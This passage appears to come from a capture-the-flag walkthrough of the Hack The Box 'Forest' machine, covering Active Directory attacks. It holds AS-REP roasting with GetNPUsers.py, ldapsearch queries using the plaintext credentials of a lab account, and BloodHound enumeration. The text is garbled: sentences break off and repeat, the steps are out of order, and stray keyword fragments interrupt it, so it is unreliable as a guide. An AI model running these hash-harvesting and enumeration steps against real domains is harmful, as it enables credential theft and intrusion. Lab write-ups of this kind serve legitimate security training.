GetNPUsers.py htb.local/ -dc-ip 10.10.10.161 -no-pass -usersfile users.txt Where users.txt is every user you scraped from LDAP. The script runs… and a few seconds later, a hash drops:
ldapsearch -H ldap://10.10.10.161 -x -D "CN=svc-alfresco,CN=Users,DC=htb,DC=local" -w s3rvice -b "DC=htb,DC=local" "(memberOf=CN=Remote Management Users,CN=Users,DC=htb,DC=local)" No. But you find another group: Service Accounts . Within it, a privilege you didn’t expect— on a domain group? No, but you spot that svc-alfresco has GenericWrite over a privileged user? Not directly. forest hackthebox walkthrough
Now you have sebastian:P@ssw0rd123! . You try WinRM again: GetNPUsers
echo "10.10.10.161 forest.htb.local htb.local" >> /etc/hosts First, you try enum4linux . It's polite but fruitless—null sessions are disabled. So you turn to the sharpest knife in the AD drawer: ldapsearch . Within it, a privilege you didn’t expect— on
ldapsearch -H ldap://10.10.10.161 -x -s base namingcontexts It works. The server hands you the root DSE: DC=htb,DC=local . Now you dig.
Instead, you enumerate using BloodHound . You upload SharpHound via SMB (since you can write to a share) or run it remotely? No execution. You fall back to Python's bloodhound.py :
You recall that with AD credentials, you can use if the user is in the right group. But svc-alfresco is not. You check group membership using net rpc or ldapsearch :